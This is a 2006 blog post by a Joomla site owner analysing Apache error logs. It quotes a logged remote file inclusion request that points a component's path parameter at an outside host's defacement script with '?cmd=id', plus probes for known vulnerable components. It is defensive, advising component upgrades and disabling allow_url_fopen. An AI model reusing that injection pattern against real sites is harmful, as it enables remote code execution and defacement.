Hackers are using scripts to hack my page…
 | I’ve already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I’ve found into the log files… |
Hackers trying remote code injection
were found more than one time in apache error.log
[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0
Remember You should ASAP update the following components to their latest version:
- com_securityimages < 3.0.5 use at least a version > 3.0.6
- com_hashcash < 1.2.1 use at least a version > 1.2.2
- com_bayesiannaivefilter has been developed but never release as a component, but it is still available at #Joomla forge developer tree.
This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You’ll find that th script is readable and contains a header.
Defacing Tool 2.0 by xxxxxx
Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.
Solutions:
- For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
- If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini allow_url_fopen = Off
Hackers trying to access well known PHP files
each lines below at least more than 500 times…in 1 day
[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan
Hacker trying to access files that do not exist
- /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
- wiki/administrator/
- [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user not found: /administrator/components/com_uhp/uhp_config.php
- [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user not found: /administrator/components/com_colophon/admin.colophon.php
- [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user not found: /administrator/components/com_mgm/help.mgm.php
which look like programs brute forcing with a set of rules some paths searching well known vulnerability
Some strange attempts…
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com
